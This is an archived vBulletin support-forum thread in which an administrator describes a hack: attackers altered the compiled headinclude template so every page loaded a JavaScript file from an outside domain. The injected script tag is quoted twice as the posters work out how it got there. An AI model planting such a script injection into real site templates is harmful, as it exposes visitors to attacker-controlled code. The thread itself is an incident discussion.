The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
||||
|
||||
How to use external.php to inject a call to a javascript?
We were hacked last night. Somehow they used external.php called in the headinclude template to include a chinese .js:
HTML Code:
<link rel="alternate" type="application/rss+xml" title="AVForums.com RSS Feed" href="http://www.avforums.com/forums/external.php?type=RSS2" /> <script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"></script><script type="text/javascript" src="http://www.avforums.com/forums/clientscript/ame.js" > Does anyone have any idea how they did this? There was no change to the plugins, files, access via the control panel or anything else suspicious which we could spot. --------------- Added [DATE]1338890536[/DATE] at [TIME]1338890536[/TIME] --------------- Ok, it seems they edited the template table, inserting a link to their js into the compiled headinclude template. |
#2
|
|||
|
|||
It looks like this is the part that includes an external js file:
Code:
<script type="text/javascript" src="http://www.veggiezjuly.org/eos.js?sscoo"> |
#3
|
||||
|
||||
Agreed. I've set my host on to the task of finding where. Thanks
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|